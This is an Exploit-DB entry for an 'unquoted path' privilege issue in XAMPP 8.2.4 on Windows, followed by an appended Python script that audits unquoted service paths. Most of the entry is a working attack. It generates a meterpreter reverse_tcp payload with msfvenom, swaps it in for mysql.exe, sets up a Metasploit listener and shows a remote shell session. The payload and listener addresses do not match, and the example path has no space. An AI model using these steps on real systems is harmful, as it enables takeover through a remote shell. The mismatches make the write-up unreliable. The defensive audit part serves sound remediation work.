XAMPP 8.2.4 – Unquoted Path

  • Author: Andrey Stoykov
    Date: 2023-07-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51585/
  • # Exploit Title: XAMPP 8.2.4 - Unquoted Path
    # Date: 07/2023
    # Exploit Author: Andrey Stoykov
    # Version: 8.2.4
    # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
    # Tested on: Windows Server 2022
    # Blog: http://msecureltd.blogspot.com/
    
    
    Steps to Exploit:
    
    1. Search for unquoted paths
    2. Generate meterpreter shell
    3. Copy shell to XAMPP directory replacing "mysql.exe"
    4. Exploit by double clicking on shell
    
    
    C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
    
    mysql mysql C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql Auto
    
    
    
    // Generate shell
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe 
    
    
    // Setup listener
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set lhost 192.168.1.13
    msf6 exploit(multi/handler) > set lport 4443
    msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > run
    
    
    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 192.168.1.13:4443 
    [*] Sending stage (175686 bytes) to 192.168.1.11
    [*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700
    
    
    meterpreter > getuid
    Server username: WIN-5PT4K404NLO\astoykov
    meterpreter > getpid
    Current pid: 4724
    meterpreter > shell
    Process 5884 created.
    Channel 1 created.
    Microsoft Windows [Version 10.0.20348.1]
    (c) Microsoft Corporation. All rights reserved.
    [...]
    C:\xampp\mysql\bin>dir
    dir
     Volume in drive C has no label.
     Volume Serial Number is 80B5-B405
    
     Directory of C:\xampp\mysql\bin
    [...]
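
A defender-side version of the search in step 1, as an added example (not part of the original exploit entry): it applies the same filters as the wmic one-liner (auto-start, outside c:\windows\, not quoted) and additionally requires a space in the executable's path, since only then is the unquoted command line ambiguous to Windows. The record layout, the function names and the three extra sample services are assumptions made for illustration.

```python
import re

# Constructed sample records: (name, pathname, startmode). The first pathname is
# the one shown on this page; the other three services are made up for contrast.
SAMPLE = [
    ("mysql", r"C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql", "Auto"),
    ("ExampleSvc", r"C:\Program Files\Example App\svc.exe -k run", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Example App\svc.exe" -k run', "Auto"),
    ("ManualSvc", r"C:\Program Files\Example App\tool.exe", "Manual"),
]

# Shortest prefix ending in ".exe" that is followed by whitespace or end of string.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)

def split_image_path(pathname):
    """Split a service PathName into (executable, arguments, was_quoted)."""
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        end = len(p) if end == -1 else end
        return p[1:end], p[end + 1:].strip(), True
    m = EXE_RE.match(p)
    if m:
        return m.group(1), p[m.end():].strip(), False
    exe, _, args = p.partition(" ")
    return exe, args.strip(), False

def audit(records):
    """Return auto-start services outside C:\\Windows whose unquoted executable path contains a space."""
    findings = []
    for name, pathname, startmode in records:
        exe, args, quoted = split_image_path(pathname)
        if startmode.lower() != "auto" or quoted:
            continue
        if exe.lower().startswith("c:\\windows\\") or " " not in exe:
            continue
        # The corrected value for the service's ImagePath: executable quoted, arguments kept.
        fixed = f'"{exe}"' + (f" {args}" if args else "")
        findings.append({"service": name, "executable": exe, "quoted_form": fixed})
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['service']}: {f['executable']}\n  set ImagePath to: {f['quoted_form']}")
```

For each finding, the remediation is to set the service's ImagePath to the quoted form and to confirm that non-administrators cannot write to the directory holding the binary.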